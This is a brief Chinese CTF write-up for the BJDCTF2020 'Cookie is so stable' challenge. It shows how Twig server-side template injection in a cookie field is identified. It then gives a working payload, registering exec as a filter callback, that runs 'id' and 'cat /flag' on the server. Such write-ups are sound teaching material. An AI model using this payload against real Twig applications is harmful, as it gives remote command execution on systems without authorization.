码迷,mamicode.com
首页 > 其他好文 > 详细

[BJDCTF2020]Cookie is so stable

时间:2020-05-14 23:50:24      阅读:97      评论:0      收藏:0      [点我收藏+]

标签:cookie   ref   sha   攻击   proc   http   env   process   size   

 

知识点

  • SSTI
  • twig

技术图片

 

题目提示cookie


技术图片

 

在user处尝试注入

{{7*‘7‘}} 回显7777777 ==> Jinja2
{{7*‘7‘}} 回显49 ==> Twig 

 

这里为Twig


payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

 


技术图片

 

获取flag

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

 


技术图片

参考
服务端模板注入攻击

[BJDCTF2020]Cookie is so stable

标签:cookie   ref   sha   攻击   proc   http   env   process   size   

原文地址:https://www.cnblogs.com/mech/p/12892111.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!